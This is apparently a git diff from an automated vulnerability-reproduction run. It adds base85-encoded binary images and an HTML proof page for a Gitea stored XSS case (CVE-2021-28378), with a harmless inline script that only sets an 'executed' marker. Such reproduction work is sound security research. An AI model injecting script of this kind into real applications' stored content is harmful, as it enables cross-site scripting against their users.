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
UYl|0<&IrT}RV|e~Wy{e20C))3YybcN

literal 0
HcmV?d00001

diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html
new file mode 100644
index 00000000..ceeaab96
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html
@@ -0,0 +1,26 @@
+<!DOCTYPE html><html lang="zh-CN" data-xss-proof="true"><head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Gitea Stored XSS Fixture - proof</title>
+  <style>
+    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }
+    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; padding: 24px; }
+    .proof { padding: 14px; border-radius: 12px; background: #14532d; color: #dcfce7; }
+    .baseline { padding: 14px; border-radius: 12px; background: #1e3a8a; color: #dbeafe; }
+    code { background: rgba(255,255,255,0.08); padding: 2px 6px; border-radius: 6px; }
+  </style>
+</head>
+<body>
+  <main>
+    <h1>Gitea Stored XSS Fixture</h1>
+    <p>Stored payload rendering path for browser proof capture.</p>
+    <div class="proof">Proof active: stored payload rendered inside the browser proof page</div>
+    <p>System: <code>gitea</code> / Family: <code>xss</code></p>
+    
+    <script>document.documentElement.setAttribute('data-xss-proof','true');document.title = "Gitea Stored XSS Fixture - proof";</script><div id="xss-proof">XSS marker executed for gitea--CVE-2021-28378</div>
+    
+    
+    
+  </main>
+
+</body></html>
\ No newline at end of file
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png
new file mode 100644
index 0000000000000000000000000000000000000000..d7159f3fb884668195ac4cb35293e12cd59539fe
GIT binary patch
literal 38082
zcmeFYRahHe{5MFwv;|tUIHhQ@0>z4zmg4T7;>F#qg#yJrI1~x)5Q0l_4Q|09cyNLR
z*y-<m{}+3+yLbCM`|Q=slbOk!Ip@rGK6XNs6eMw;kv+r0!orc35?8^(dIap=A9;Eo
z*nFavxrc@I5=&ZKOwB!QZ{dMA1vYulku({Jv}$gx4WiZo>eF0oLtbcu;8jHwCUA9M
zTj!<Q2H1?C_ZKgH8Z&POBi+n+)9-{HJon0f@$V*BSa%1kg#Yb0|G;|jZ)fDu{rCU2
zpGcmz{o7*c(_lULw{`yc|J4&NA|VM02~cQ6X+%OqDKsJ?Fc9*u!!d3bS6A*Ho}M0_
z?jG)*ULKe3UMy{z55IY@ycSe=At~u6Dr(1pcj<Msf?}~#R1_5j{Tr@}gWvdFfBU;7
zWIm3fjJ328DXFQgZeF|SE9iZu(Bx*-$B(Ye3@u1S9b)0si_L!5?`UW~0V9ib3rb2(
zp6v-G;AyxSmyE)A7w&KA6Q+K5Alym{$T8k?KLUyPY~3CO{MWdpBj>w4<VpsOG?xYX
z_)zJO@xyQWvPmD3TU!qX81ZgyF#iU2`7S;)^WX`LZ!{Yr*cp0rbmR5N^DEXAhjc4&
z@5|+G<V)bJkw<vvilNE)1I$#UTCk^WACb#jOi<7m2XM@}3o$U>KQ}iv7vz+6)~EOL
zR!d8#`}g)1dZ+$hL$(GHiEv5^<FA#=Klweyv8Hk^LgJd-kN<ll=k2bwC)lxc%6~*3
zep?736&&8gJMeC5`q#8iiA~Ky3!=WiNd>|8)8An2MmFcHUBk-%JJz$<>|shBhgBl@
z@S9I%P1W)F$@8aAm4M5zD4#z)OiT=fK<*0z7li=>2V*>M{5MAlITZ1%$jKjhe#V+2
zu_D*y;P`JY|8Xb3Us3wM&W4ua5Pbtq{luyEL)i3O>u1K{A&XCCZ4B04A@DO+!{!k4
z$ki9%`sdGO|M!572+wkY7mWY??c;yvY~8>2`rr1?^M~L5ZGW)8{PA!6uo^!7|0n$4
z^}|t|X>U@CYbjX>KE1PZxWy~_{;<SyDq+WFw}bXd;~r`eZ^Ahx4GnMv*;Kh!AqFC=
znU=oU<bI@b*{W14S6DL3#VDOdXMm~W<*lV&^s93^-=AceKHp!s+d%1lRh%l<wXiWR
z<<%@#o<<BHobSxc%uHnxKk)Hsinh2o3A*gaz4js&blt}ti%Nj150Oo(<|`!gJ7m{6
z7|FuRLCq~5*J$K`rW<N*cXziqiLkHzi`t)0BG<1u|1P$oAu@^Vv$@h=X4A}u)0{5*
z)&ITmhQ?+G@nS!1bNi!@7SCk+%a!vLhRXB>#i3zjI(XCNOB6!Roo7~j{%$GU<`Nn6
z0+VKLc;}eQuwecmLgrXmTkpI5=Hml~?E;tGjR<nS-^4uYkXJ8X+8?iPzxg65;&V0F
zDaB<bb>~N5$8Nw6;TgC}fLb@){lZ?gL)41JmQLlV_K4z93lkf`10J6h8<bX|m20DE
zyZXOV8+SWz%~pGDtI)Hueim8ZM4_r3IyNc^7y@4pycMX!Cec$M^J}N>&v@I~+Uf^f
